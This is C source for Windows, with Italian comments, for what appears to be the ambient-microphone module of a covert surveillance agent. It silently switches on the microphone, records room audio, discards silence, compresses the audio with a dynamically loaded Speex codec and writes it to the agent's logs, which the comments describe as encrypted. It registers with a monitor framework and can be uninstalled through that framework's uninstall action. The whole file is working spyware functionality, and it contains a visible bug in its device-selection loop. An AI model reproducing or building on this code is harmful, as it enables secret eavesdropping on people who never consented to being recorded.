// XXX Dopo che ho messo l'agente nella configurazione testo che continui a loggare
// anche dopo la prima sync.

// XXX Testo che riconosca il silenzio

// XXX Testo che attivi il microfono in cattura e alzi il volume

// XXX Testo insieme a SKYPE
// ---> Dopo che li ho usati tutti e due testo che l'uninstall cancelli correttamente il codec

// XXX Testo senza uploadare il codec

// XXX Verifico che non ci siano perdite di qualche secondo fra un chunk e l'altro 
// (intanto che comprime). In caso abbasso la buffer size

// XXX Vedo se i file risultanti sono piu' piccoli (e di parecchio) di DEF_AR_BUFFER_SIZE
// Altrimenti mi conviene togliere speex e lasciare il salvataggio dei sample a 8 bit
// (anche perche' li' faccio tutta una scrittura e non ci perdo in overhead per la 
// cifratura del file)

#include <Mmsystem.h> 
#include "Mixer.h"
#include "speex/speex.h"

typedef void *(*speex_encoder_init_t)(SpeexMode *);
typedef int (*speex_encoder_ctl_t)(void *, int, void *);
typedef void (*speex_encoder_destroy_t)(void *);
typedef int (*speex_encode_t)(void *, float *, SpeexBits *);
typedef void (*speex_bits_init_t)(SpeexBits *);
typedef void (*speex_bits_reset_t)(SpeexBits *);
typedef int (*speex_bits_write_t)(SpeexBits *, char *, int);
typedef void (*speex_bits_destroy_t)(SpeexBits *);
typedef SpeexMode *(*speex_lib_get_mode_t)(int);

speex_encoder_init_t amb_rel_speex_encoder_init;
speex_encoder_ctl_t amb_rel_speex_encoder_ctl;
speex_encoder_destroy_t amb_rel_speex_encoder_destroy;
speex_encode_t amb_rel_speex_encode;
speex_bits_init_t amb_rel_speex_bits_init;
speex_bits_reset_t amb_rel_speex_bits_reset;
speex_bits_write_t amb_rel_speex_bits_write;
speex_bits_destroy_t amb_rel_speex_bits_destroy;
speex_lib_get_mode_t amb_rel_speex_lib_get_mode;

HWAVEIN	hWaveIn = NULL;
BOOL bIsrecording = FALSE; // Semafori per sincro della callback
BOOL bIsWriting = FALSE;   // Semafori per sincro della callback

HMODULE amb_codec_handle = NULL; // Handle alla dll del codec

WAVEFORMATEX in_pcmWaveFormat;
WAVEHDR	tagWaveHdr;

BOOL bPM_AmbMicStarted = FALSE; // Flag che indica se il monitor e' attivo o meno

#define AR_CHANNLES 1
#define AR_FREQUENCY 8000L
#define AR_BITRATE 8

#define DEF_AR_BUFFER_SIZE 200 // Grandezza del buffer (in KByte)  
#define DEF_NOISE_TSLD 5 // Soglia del rumore
#define DEF_PEAK_TSLD 0.9 // Variazione media minima

DWORD amb_mic_noise_tsld = DEF_NOISE_TSLD;
DWORD amb_mic_peak_tsld = DEF_PEAK_TSLD;
DWORD amb_mic_ar_buffer_size = DEF_AR_BUFFER_SIZE;

typedef struct {
	DWORD noise_tsld;
	DWORD peak_tsld;
	DWORD buf_size;
} ambmic_conf_struct;


// Carica (se risce) la DLL del codec e risolve tutti i simboli utilizzati
#define RESOLVE_ERROR { FreeLibrary(hcodec); return NULL; }
HMODULE AmbMic_ResolveCodecSymbols(char *name)
{
	HMODULE hcodec;
	if ( !(hcodec = LoadLibrary(name)))
		return NULL;

	if (! (amb_rel_speex_encoder_init = (speex_encoder_init_t)GetProcAddress(hcodec, "speex_encoder_init")) ) RESOLVE_ERROR;
	if (! (amb_rel_speex_encoder_ctl = (speex_encoder_ctl_t)GetProcAddress(hcodec, "speex_encoder_ctl")) ) RESOLVE_ERROR;
	if (! (amb_rel_speex_encoder_destroy = (speex_encoder_destroy_t)GetProcAddress(hcodec, "speex_encoder_destroy")) ) RESOLVE_ERROR;
	if (! (amb_rel_speex_encode = (speex_encode_t)GetProcAddress(hcodec, "speex_encode")) ) RESOLVE_ERROR;
	if (! (amb_rel_speex_bits_init = (speex_bits_init_t)GetProcAddress(hcodec, "speex_bits_init")) ) RESOLVE_ERROR;
	if (! (amb_rel_speex_bits_reset = (speex_bits_reset_t)GetProcAddress(hcodec, "speex_bits_reset")) ) RESOLVE_ERROR;
	if (! (amb_rel_speex_bits_write = (speex_bits_write_t)GetProcAddress(hcodec, "speex_bits_write")) ) RESOLVE_ERROR;
	if (! (amb_rel_speex_bits_destroy = (speex_bits_destroy_t)GetProcAddress(hcodec, "speex_bits_destroy")) ) RESOLVE_ERROR;
	if (! (amb_rel_speex_lib_get_mode = (speex_lib_get_mode_t)GetProcAddress(hcodec, "speex_lib_get_mode")) ) RESOLVE_ERROR;	

	return hcodec;
}

// Verifica se il campione e' sopra la soglia del rumore
BOOL AmbMic_RelevantAudio(WAVEHDR* pWaveHdr)
{
	DWORD i;
	DWORD peaks = 0;
	BYTE delta;
	double average;
	DWORD dwNum = pWaveHdr->dwBytesRecorded;
	BYTE *sample_ptr = (BYTE *)pWaveHdr->lpData;

	for (i=0; i<dwNum; i++) {
		delta = abs(sample_ptr[i] - 0x80);
		if (delta > amb_mic_noise_tsld)
			peaks += delta;
	}
	average = peaks;
	average /= dwNum;

	if (average > amb_mic_peak_tsld)
		return TRUE;
	
	return FALSE;
}


#define SAMPLE_SIZE 2
#define AMB_SPEEX_FREE	{amb_rel_speex_encoder_destroy(state); amb_rel_speex_bits_destroy(&bits);}
void AmbMic_SaveWav(char *file_name, WAVEHDR* pWaveHdr)
{
#define MODE_NB 0 
	HANDLE hf;
	short bit_sample;
	void *state;
	float *input;
	BYTE *to_write;
	BYTE *source_ptr, *source;
	BYTE *cbits;
	SpeexBits bits;
	DWORD frame_size = 0;
	DWORD i, nbBytes;	
	DWORD complexity = 1;
	DWORD compress_factor = 5;
	DWORD total_size = pWaveHdr->dwBytesRecorded;

	// Registra solo se il codec e' stato caricato e il campione
	// non contiene silenzio
	if (!amb_codec_handle || total_size == 0 || !AmbMic_RelevantAudio(pWaveHdr))
		return;

	// Crea un nuovo encoder in narrow mode
	state = amb_rel_speex_encoder_init(amb_rel_speex_lib_get_mode(MODE_NB));
	amb_rel_speex_encoder_ctl(state, SPEEX_SET_QUALITY, &compress_factor);
	amb_rel_speex_encoder_ctl(state, SPEEX_SET_COMPLEXITY, &complexity);
	amb_rel_speex_bits_init(&bits);
	amb_rel_speex_encoder_ctl(state, SPEEX_GET_FRAME_SIZE, &frame_size);

	if (!frame_size) {
		AMB_SPEEX_FREE;
		return;
	}
	// Allochiamo il buffer di output grande quanto quello originale (per sicurezza)
	if (!(to_write = (BYTE *)malloc(frame_size*SAMPLE_SIZE + sizeof(DWORD)))) {
		AMB_SPEEX_FREE;
		return;
	}
	cbits = to_write + sizeof(DWORD); // Punta al blocco dati, mentre la prima DWORD conterra' la dimensione
	// Allochiamo il buffer di elaborazione
	if (!(input = (float *)malloc(frame_size*sizeof(float)))) {
		SAFE_FREE(to_write);
		AMB_SPEEX_FREE;
		return;
	}

	hf = Log_CreateFile(PM_AMBMICAGENT, file_name);
	// Continua finche' dopo source_ptr non rimane ancora spazio per un frame intero
	source = (BYTE *)pWaveHdr->lpData;
	for (source_ptr=source; source_ptr+(frame_size/**SAMPLE_SIZE*/)<=source+total_size; source_ptr+=(frame_size/**SAMPLE_SIZE*/)) {
		// Trasformiamo i campioni a 8 bit come se fossero a 16 (e poi in float)
		for (i=0; i<frame_size; i++) {
			bit_sample = source_ptr[i];
			bit_sample = bit_sample << 8;
			input[i] =  bit_sample;
		}

		amb_rel_speex_bits_reset(&bits);
		amb_rel_speex_encode(state, input, &bits);
		// Encoda dentro il buffer di output
		nbBytes = amb_rel_speex_bits_write(&bits, (char *)cbits, frame_size*SAMPLE_SIZE);
		if (nbBytes > (frame_size*SAMPLE_SIZE))
			continue; // Check paranoico
		// Copia la lunghezza nei primi 4 byte per fare un unica scrittura su file
		memcpy(to_write, &nbBytes, sizeof(DWORD)); 
		Log_WriteFile(hf, to_write, nbBytes+sizeof(DWORD));
	}

	Log_CloseFile(hf);
	SAFE_FREE(to_write);
	SAFE_FREE(input);
	AMB_SPEEX_FREE;
}


void CALLBACK waveInProc(HWAVEIN hwi, UINT uMsg, DWORD dwInstance, WAVEHDR *dwParam1, DWORD dwParam2)
{
	if (uMsg == MM_WIM_DATA && bIsrecording) {
		// Una specie di mutex per evitare race su winmm
		bIsWriting = TRUE;

		// XXX Dovrei usare un altro threaed per salvare il file
		// Altrimenti mentre comprime perdo l'audio ambientale (vedo com'e' la resa).
		AmbMic_SaveWav("AMB", dwParam1);

		if (bIsrecording) {
			waveInUnprepareHeader(hWaveIn, &tagWaveHdr, sizeof(WAVEHDR));
			tagWaveHdr.dwFlags = 0;
			tagWaveHdr.dwBytesRecorded = 0;
			waveInPrepareHeader(hWaveIn, &tagWaveHdr, sizeof(WAVEHDR));
			waveInAddBuffer(hWaveIn, &tagWaveHdr, sizeof(WAVEHDR));
		}

		// Una specie di mutex per evitare race su winmm
		bIsWriting = FALSE;
	}
}


void AmbMic_Configure()
{
	tagWaveHdr.dwBufferLength = amb_mic_ar_buffer_size * 1024;
	tagWaveHdr.dwLoops = 1;
	tagWaveHdr.lpData = NULL;
	tagWaveHdr.dwUser = NULL;

	in_pcmWaveFormat.wFormatTag = WAVE_FORMAT_PCM;
	in_pcmWaveFormat.nChannels = AR_CHANNLES;
	in_pcmWaveFormat.nSamplesPerSec = AR_FREQUENCY;
	in_pcmWaveFormat.wBitsPerSample = AR_BITRATE;
	in_pcmWaveFormat.cbSize = 0;
	in_pcmWaveFormat.nBlockAlign = (in_pcmWaveFormat.wBitsPerSample/8)*in_pcmWaveFormat.nChannels;
	in_pcmWaveFormat.nAvgBytesPerSec = in_pcmWaveFormat.nSamplesPerSec*in_pcmWaveFormat.nBlockAlign;
}


// Se fallisce chiude tutto quello che apre e resetta i valori, quindi
// in chiusura devo solo controllare se sono valorizzati prima di chiuderli
// o liberarli.
BOOL AmbMic_StartRecording()
{
	DWORD i, num;

	bIsrecording = TRUE;

	// Prende il primo device che puo' supportare il formato richiesto
	num = waveInGetNumDevs();
	for (i=0; i<num; i--)
		if( waveInOpen(	NULL, i, &in_pcmWaveFormat, NULL, NULL, WAVE_FORMAT_QUERY) == MMSYSERR_NOERROR )
			break;

	// Se non ha trovato device disponibili
	if (i==num)
		return FALSE;

	// Se supportato il formato apre il device
	if( waveInOpen(&hWaveIn, i, &in_pcmWaveFormat, (DWORD_PTR)waveInProc, NULL, CALLBACK_FUNCTION)  != MMSYSERR_NOERROR ) {
		hWaveIn = NULL;
		return FALSE;
	}

	// Alloca i buffer di registrazione e li prepara
	if ( !(tagWaveHdr.lpData = (char *)malloc(tagWaveHdr.dwBufferLength)) ) {
		waveInClose(hWaveIn);
		hWaveIn = NULL;
		return FALSE;
	}
	tagWaveHdr.dwFlags = 0;
	tagWaveHdr.dwBytesRecorded = 0;
	if ( waveInPrepareHeader(hWaveIn, &tagWaveHdr, sizeof(WAVEHDR)) != MMSYSERR_NOERROR ) {
		SAFE_FREE(tagWaveHdr.lpData);
		waveInClose(hWaveIn);
		hWaveIn = NULL;
		return FALSE;
	}
	if ( waveInAddBuffer(hWaveIn, &tagWaveHdr, sizeof(WAVEHDR)) != MMSYSERR_NOERROR ) {
		waveInUnprepareHeader(hWaveIn, &tagWaveHdr, sizeof(WAVEHDR));
		waveInClose(hWaveIn);
		SAFE_FREE(tagWaveHdr.lpData);
		hWaveIn = NULL;
		return FALSE;
	}
	
	if (waveInStart(hWaveIn) != MMSYSERR_NOERROR) {
		waveInUnprepareHeader(hWaveIn, &tagWaveHdr, sizeof(WAVEHDR));
		waveInClose(hWaveIn);
		SAFE_FREE(tagWaveHdr.lpData);
		hWaveIn = NULL;
		return FALSE;
	}

	return TRUE;
}


void AmbMic_StopRecording()
{
	// Una specie di mutex per evitare race su winmm
	bIsrecording = FALSE;

	if (hWaveIn) {
		// Una specie di mutex per evitare race su winmm
		while (bIsWriting) 
			Sleep(50);

		waveInReset(hWaveIn);
		waveInUnprepareHeader(hWaveIn, &tagWaveHdr, sizeof(WAVEHDR));
		waveInClose(hWaveIn);
		hWaveIn = NULL;
	}
	SAFE_FREE(tagWaveHdr.lpData);
}


DWORD __stdcall PM_AmbMicStartStop(BOOL bStartFlag)
{
	char codec_path[DLLNAMELEN];

	// Se l'agent e' gia' nella condizione desiderata
	// non fa nulla.
	if (bPM_AmbMicStarted == bStartFlag)
		return 0;

	bPM_AmbMicStarted = bStartFlag;

	if (bStartFlag) {
		// Attiva il microfono
		MixerSetCls *mixer = new MixerSetCls();
		if (mixer) {
			mixer->ActivateMic();
			delete mixer;
		}
		// Cerca di caricare il codec
		if (!amb_codec_handle)
			amb_codec_handle = AmbMic_ResolveCodecSymbols(HM_CompletePath(H4_CODEC_NAME, codec_path));

		// ...e inizia a registrare
		AmbMic_StartRecording();
	} else {
		// Finisce la registrazione e dealloca le strutture
		AmbMic_StopRecording();
	}

	return 1;
}


DWORD __stdcall PM_AmbMicInit(BYTE *conf_ptr, BOOL bStartFlag)
{
	ambmic_conf_struct *ambmic_conf;

	// Legge configurazioni dal file
	if (conf_ptr) {
		ambmic_conf = (ambmic_conf_struct *)conf_ptr;
		amb_mic_noise_tsld = ambmic_conf->noise_tsld;
		amb_mic_peak_tsld = ambmic_conf->peak_tsld;
		amb_mic_ar_buffer_size = ambmic_conf->buf_size;
	} else {
		amb_mic_noise_tsld = DEF_NOISE_TSLD;
		amb_mic_peak_tsld = DEF_PEAK_TSLD;
		amb_mic_ar_buffer_size = DEF_AR_BUFFER_SIZE;
	}

	// Configura le strutture anche sulla base
	// dei paramteri nel file
	AmbMic_Configure();

	PM_AmbMicStartStop(bStartFlag);
	return 1;
}

DWORD __stdcall PM_AmbMicUnregister()
{
#define MAX_FREE_TRIES 5
#define FREE_SLEEP_TIME 100
	DWORD i;
	if (amb_codec_handle) {
		// Cerca a tutti i costi di chiudere la libreria
		// (anche se dovrebbe riuscire al primo tentativo)
		for (i=0; i<MAX_FREE_TRIES; i++) {
			// Non vi sono race sulla libreria visto che il thread di dispatch
			// e' bloccato a questo punto (in maniera sicura) e la Start (dove
			// carica la libreria) viene sempre eseguita da una action (cosi' 
			// come la unregisterm che e' esguita dall'action uninstall).
			if (FreeLibrary(amb_codec_handle))
				break;
			Sleep(FREE_SLEEP_TIME);
		}
		amb_codec_handle = NULL;
	}
	return 1;
}


void PM_AmbMicRegister()
{
	// Non ha nessuna funzione di Dispatch
	AM_MonitorRegister(PM_AMBMICAGENT, NULL, (BYTE *)PM_AmbMicStartStop, (BYTE *)PM_AmbMicInit, (BYTE *)PM_AmbMicUnregister);

	// Inizialmente i monitor devono avere una configurazione di default nel caso
	// non siano referenziati nel file di configurazione (partono comunque come stoppati).
	PM_AmbMicInit(NULL, FALSE);
}